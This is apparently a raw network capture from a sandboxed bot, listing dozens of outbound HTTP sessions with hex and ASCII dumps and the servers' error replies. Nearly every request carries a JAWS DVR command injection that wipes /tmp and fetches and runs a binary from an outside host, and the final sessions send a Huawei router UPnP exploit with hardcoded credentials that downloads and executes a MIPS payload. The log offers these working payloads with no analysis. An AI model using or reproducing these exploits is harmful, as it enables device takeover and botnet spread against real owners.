                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          576192.168.2.233504857.180.216.7380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:30.173192978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.437764883 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          577192.168.2.235277041.111.241.3480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:30.188510895 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.468492031 CET59INHTTP/1.1 400 Bad Request
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          578192.168.2.2352076117.52.81.22680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:30.193653107 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          579192.168.2.2336186193.46.47.24280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:30.204859972 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          580192.168.2.235444223.48.76.9180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:30.270725965 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.632929087 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 65 30 63 31 33 33 64 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 30 26 23 34 36 3b 31 39 66 34 39 39 31 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;2e0c133d&#46;1704173130&#46;19f4991d</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          581192.168.2.2350366107.167.54.15780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:31.230782986 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:31.383652925 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:23:53 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          582192.168.2.233297652.1.227.24780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:31.234448910 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:31.392004013 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:31 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          583192.168.2.233654262.210.48.11380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:31.316042900 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:31.555363894 CET1286INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:31 GMT
                                                          Server: Apache
                                                          Accept-Ranges: bytes
                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: 0
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                          Jan 2, 2024 06:25:31.555524111 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                          Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                          Jan 2, 2024 06:25:31.555811882 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                          Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
                                                          Jan 2, 2024 06:25:31.555824041 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                          Jan 2, 2024 06:25:31.556318045 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                          Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                          Jan 2, 2024 06:25:31.556372881 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                          Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                          Jan 2, 2024 06:25:31.556742907 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                          Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                          Jan 2, 2024 06:25:31.557271957 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                          Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to srv2.des-click.com's <a href="mailto:laraaj5@gmail
                                                          Jan 2, 2024 06:25:31.557285070 CET361INData Raw: 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50
                                                          Data Ascii: um=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          584192.168.2.2339910193.182.144.15480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:31.359030008 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          585192.168.2.234167023.15.103.2180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:31.414283991 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:31.755538940 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:31 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:31 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 39 66 61 35 36 62 38 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 31 26 23 34 36 3b 35 39 66 30 39 34 61 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;89fa56b8&#46;1704173131&#46;59f094a8</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          586192.168.2.2354612156.254.75.5437215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:31.710967064 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:33.283621073 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 